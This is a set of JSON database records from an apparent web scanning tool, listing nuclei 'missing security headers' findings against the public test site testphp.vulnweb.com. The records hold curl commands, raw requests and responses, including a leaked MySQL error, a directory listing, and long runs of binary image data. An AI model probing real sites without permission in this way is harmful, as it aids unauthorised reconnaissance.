"cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:21.257Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 897, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:21.449Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 898, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:42:21.639Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 899, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:42:21.830Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 900, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:22.034Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 901, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:22.230Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 